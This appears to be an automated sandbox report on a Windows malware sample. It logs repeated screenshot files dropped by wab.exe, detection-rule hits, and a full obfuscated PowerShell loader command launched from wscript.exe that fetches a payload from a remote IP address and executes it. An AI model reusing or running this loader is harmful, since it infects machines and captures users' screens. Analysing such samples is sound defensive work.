              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174017.dat entropy: 7.99890940863Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174117.dat entropy: 7.99890940863Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174217.dat entropy: 7.99890940863Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192128.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192228.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192328.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192428.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192528.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192628.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192728.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192828.dat entropy: 7.99874704808Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192928.dat entropy: 7.99902079555Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193028.dat entropy: 7.99902079555Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174317.dat entropy: 7.99895023393Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174417.dat entropy: 7.99895808296Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174517.dat entropy: 7.99885695321Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174617.dat entropy: 7.99885695321Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174718.dat entropy: 7.99885695321Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174818.dat entropy: 7.99885695321Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_174918.dat entropy: 7.99885695321Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175018.dat entropy: 7.99880335139Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175118.dat entropy: 7.99880335139Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175218.dat entropy: 7.99880335139Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193129.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193229.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193329.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193429.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193529.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193629.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193729.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193829.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_193929.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194029.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175318.dat entropy: 7.99880335139Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175418.dat entropy: 7.99880335139Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175518.dat entropy: 7.99880335139Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175618.dat entropy: 7.99880335139Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175718.dat entropy: 7.99880335139Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175818.dat entropy: 7.99880335139Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175919.dat entropy: 7.99880335139Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180019.dat entropy: 7.99880335139Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180119.dat entropy: 7.99880335139Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180219.dat entropy: 7.99880335139Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212214.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212317.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212417.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212518.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212618.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212721.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212822.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212922.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213025.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213126.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213227.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213330.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213430.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213533.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213634.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213735.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213838.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213939.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214042.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214143.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214247.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194130.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214350.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194230.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214451.dat entropy: 7.99892024752Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194330.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214555.dat entropy: 7.99900846116Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194430.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214658.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194531.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214802.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194631.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214906.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194731.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215010.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194831.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215114.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194931.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215218.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195031.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215322.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195131.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215429.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195231.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215536.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195331.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215643.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195431.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215753.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195532.dat entropy: 7.99905837886Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215903.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195632.dat entropy: 7.99877097759Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_220023.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195732.dat entropy: 7.99877097759Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_220147.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195832.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195933.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200033.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200133.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180319.dat entropy: 7.99880335139Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200233.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180419.dat entropy: 7.99880335139Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200333.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180519.dat entropy: 7.99880335139Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200433.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180619.dat entropy: 7.99888642912Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200533.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180719.dat entropy: 7.9989667577Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200634.dat entropy: 7.99888023558Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180819.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200734.dat entropy: 7.99888023558Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180920.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200835.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181020.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200935.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181120.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201035.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181220.dat entropy: 7.99901409683Jump to dropped file

              System Summary

              barindex
              Source: amsi32_4784.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5768, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 4784, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7280
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7280
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7280Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7280Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineD
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineDJump to behavior
